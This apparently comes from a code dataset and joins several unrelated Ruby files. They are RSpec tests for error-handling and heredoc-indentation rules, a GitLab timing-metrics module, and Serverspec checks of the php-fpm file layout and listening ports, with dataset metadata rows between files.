it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ForbiddenError" do
let(:err) { Script::Layers::Infrastructure::Errors::ForbiddenError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when GraphqlError" do
let(:err) { Script::Layers::Infrastructure::Errors::GraphqlError.new([]) }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptRepushError" do
let(:err) { Script::Layers::Infrastructure::Errors::ScriptRepushError.new('api_key') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopAuthenticationError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopAuthenticationError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopScriptConflictError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopScriptConflictError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppScriptNotPushedError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppScriptNotPushedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopScriptUndefinedError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopScriptUndefinedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
end
end
end
| 33.061983 | 101 | 0.650669 |
b974b8a7e8a78f4615e00f900327524682277709 | 1,386 | require 'logger'
require_relative 'gitlab_config'
require_relative 'gitlab_logger'
module GitlabMetrics
module System
# THREAD_CPUTIME is not supported on OS X
if Process.const_defined?(:CLOCK_THREAD_CPUTIME_ID)
def self.cpu_time
Process.
clock_gettime(Process::CLOCK_THREAD_CPUTIME_ID, :millisecond)
end
else
def self.cpu_time
Process.
clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID, :millisecond)
end
end
# Returns the current monotonic clock time in a given precision.
#
# Returns the time as a Fixnum.
def self.monotonic_time
Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond)
end
end
def self.logger
$logger
end
# Measures the execution time of a block.
#
# Example:
#
# GitlabMetrics.measure(:find_by_username_duration) do
# User.find_by_username(some_username)
# end
#
# name - The name of the field to store the execution time in.
#
# Returns the value yielded by the supplied block.
def self.measure(name)
start_real = System.monotonic_time
start_cpu = System.cpu_time
retval = yield
real_time = System.monotonic_time - start_real
cpu_time = System.cpu_time - start_cpu
logger.debug("metrics: name=#{name.inspect} wall_time=#{real_time} cpu_time=#{cpu_time}")
retval
end
end
| 24.315789 | 93 | 0.694084 |
ff972d0639ff336474ff1f87886e302461a0dd00 | 1,229 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Layout::ClosingHeredocIndentation do
  subject(:cop) { described_class.new(config) }
  let(:config) do
    RuboCop::Config.new('Layout/ClosingHeredocIndentation' => cop_config)
  end
  let(:cop_config) { { 'Enabled' => true } }
  # Heredoc delimiters inside the fixtures below are indentation-sensitive;
  # the fixtures must not be reformatted.
  it 'accepts correctly indented closing heredoc' do
    expect_no_offenses(<<-RUBY.strip_indent)
      class Test
        def foo
          <<-SQL
            bar
          SQL
        end
      end
    RUBY
  end
  # The ^^^^^ marker line inside expect_offense pinpoints the offence and
  # its message at the misaligned closing delimiter.
  it 'registers an offence for bad indentation of a closing heredoc' do
    expect_offense(<<-RUBY.strip_indent)
      class Test
        def foo
          <<-SQL
            bar
      SQL
      ^^^^^ `SQL` is not aligned with `<<-SQL`.
        end
      end
    RUBY
  end
  describe '#autocorrect' do
    # Autocorrection should re-align the closing delimiter with its opener.
    it 'corrects bad indentation' do
      corrected = autocorrect_source(<<-RUBY.strip_indent)
        class Test
          def foo
            <<-SQL
              bar
        SQL
          end
        end
      RUBY
      expect(corrected).to eq <<-RUBY.strip_indent
        class Test
          def foo
            <<-SQL
              bar
            SQL
          end
        end
      RUBY
    end
  end
end
| 20.830508 | 73 | 0.545159 |
33109ae98c61fb6a03a32d59b893a60691e45c85 | 2,001 | shared_examples 'php-fpm::layout' do
  # Verifies the container-local php-fpm configuration layout under
  # /opt/docker/etc/php: the config directories plus the main ini, fpm
  # config and application pool files.
  it "should have local php-fpm layout" do
    expect(file("/opt/docker/etc/php")).to be_directory
    expect(file("/opt/docker/etc/php/fpm")).to be_directory
    expect(file("/opt/docker/etc/php/fpm/pool.d")).to be_directory
    expect(file("/opt/docker/etc/php/php.ini")).to be_file
    expect(file("/opt/docker/etc/php/fpm/php-fpm.conf")).to be_file
    expect(file("/opt/docker/etc/php/fpm/pool.d/application.conf")).to be_file
  end
end
shared_examples 'php-fpm5::layout' do
  # The expected PHP 5.x pool directory symlink depends on the base image:
  # the official PHP image keeps it under /usr/local, distro packages keep
  # it under /etc.
  it "should have local php-fpm 5.x layout" do
    if $testConfiguration[:phpOfficialImage]
      expect(file("/usr/local/etc/php-fpm.d")).to be_symlink
    else
      case os[:family]
      when 'redhat'
        expect(file("/etc/php-fpm.d")).to be_symlink
      when 'debian', 'ubuntu'
        expect(file("/etc/php5/fpm/pool.d")).to be_symlink
      end
    end
  end
end
shared_examples 'php-fpm7::layout' do
  # Same check as the 5.x layout example, but for the PHP 7.0 paths.
  it "should have local php-fpm 7.x layout" do
    if $testConfiguration[:phpOfficialImage]
      expect(file("/usr/local/etc/php-fpm.d")).to be_symlink
    else
      case os[:family]
      when 'redhat'
        expect(file("/etc/php-fpm.d")).to be_symlink
      when 'debian', 'ubuntu'
        expect(file("/etc/php/7.0/fpm/pool.d")).to be_symlink
      end
    end
  end
end
shared_examples 'php-fpm::listening::public' do
  describe port(9000) do
    # Retries because php-fpm may still be starting when the suite runs.
    it "php-fpm should be listening", :retry => 10, :retry_wait => 3 do
      # Accept either the IPv6 ("::") or IPv4 ("0.0.0.0") wildcard bind.
      should be_listening.on('::').or(be_listening.on('0.0.0.0'))
    end
  end
end
shared_examples 'php-fpm::listening::local-only' do
  describe port(9000) do
    # Port 9000 must be reachable only via loopback (IPv4 or IPv6), never
    # bound to a public wildcard address.
    it "php-fpm should be listening local", :retry => 10, :retry_wait => 3 do
      should_not be_listening.on('0.0.0.0')
      should_not be_listening.on('::')
      should be_listening.on('::1').or(be_listening.on('127.0.0.1'))
    end
  end
end | 36.381818 | 82 | 0.617691 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.